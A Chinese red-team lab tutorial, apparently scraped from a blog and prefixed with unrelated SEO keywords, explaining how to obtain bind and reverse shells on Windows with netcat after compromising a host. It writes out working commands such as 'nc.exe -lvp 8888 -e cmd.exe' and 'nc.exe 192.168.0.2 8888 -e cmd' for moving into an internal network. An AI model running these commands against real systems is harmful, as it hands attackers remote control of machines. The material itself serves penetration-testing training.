印刷报价下单网站开发,wordpress电影广告插件,关键词查询网站,wordpress 主题字号目录
一.利用NC工具在windows系统执行反弹shell
1. Windows正向连接shell
2.Windows反向连接shell 前文推荐#xff1a;
《红蓝攻防对抗实战》一. 隧道穿透技术详解《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网《红蓝攻防对抗实战》三.内网探测协议出网…
目录
一.利用NC工具在windows系统执行反弹shell
1. Windows正向连接shell
2.Windows反向连接shell 前文推荐
《红蓝攻防对抗实战》一. 隧道穿透技术详解《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网《红蓝攻防对抗实战》三.内网探测协议出网之HTTP/HTTPS协议探测出网《红蓝攻防对抗实战》四.内网探测协议出网之ICMP协议探测出网《红蓝攻防对抗实战》五.内网探测协议出网之DNS协议探测出网 假设在内网环境中发现主机通过漏洞获取到该主机控制权限想要进一步对内网环境进行后续利用这里可以通过反弹shell的方式去进行穿透本次实验以nc工具为例来演示不同系统的操作实验拓扑如图1-1所示。 一.利用NC工具在windows系统执行反弹shell
图1-1 windows系统下实验拓扑图 1. Windows正向连接shell
本次实验环境如图1-1所示假设已经获取到目标服务器的系统权限上传nc工具使用正向连接反弹shell的方法将目标服务器的shell反弹到本地主机。
1首先在目标服务器执行nc.exe -lvp 8888 -e cmd.exe命令监听8888端口使用-e参数将cmd.exe程序反弹连接到此端口的服务开启监听执行成功后如图1-2所示。
图1-2 服务器开启监听 2目标服务器执行监听后在本地主机执行nc.exe 192.168.0.3 8888命令去连接目标服务器nc开启监听的端口连接成功即可获取到目标服务器的shell权限如图1-3所示。
图1-3 windwos主机获取反弹shell 2.Windows反向连接shell 本次实验环境如图1-1所示在目标服务器允许出网的情况下在本地主机上获取到目标服务器的shell权限可以尝试使用反向连接的方法。
1首先在本地主机中使用nc工具开启监听执行nc.exe -lvp 8888命令如图1-4所示。
图1-4 windows主机开启服务端监听
2当本地主机开启监听后在目标服务器执行nc.exe 192.168.0.2 8888 -e cmd命令主动连接本地主机的8888端口将cmd命令反弹到目标服务器如图1-5所示
图1-5 服务器连接主机 3此时当目标服务器访问我们的本地8888端口时即可执行获取到目标服务器的Shell权限使用Ipconfig命令查看获取到的反弹shell的IP可查看到是目标服务器如图1-6所示。
图1-6 获取服务器反弹shell的IP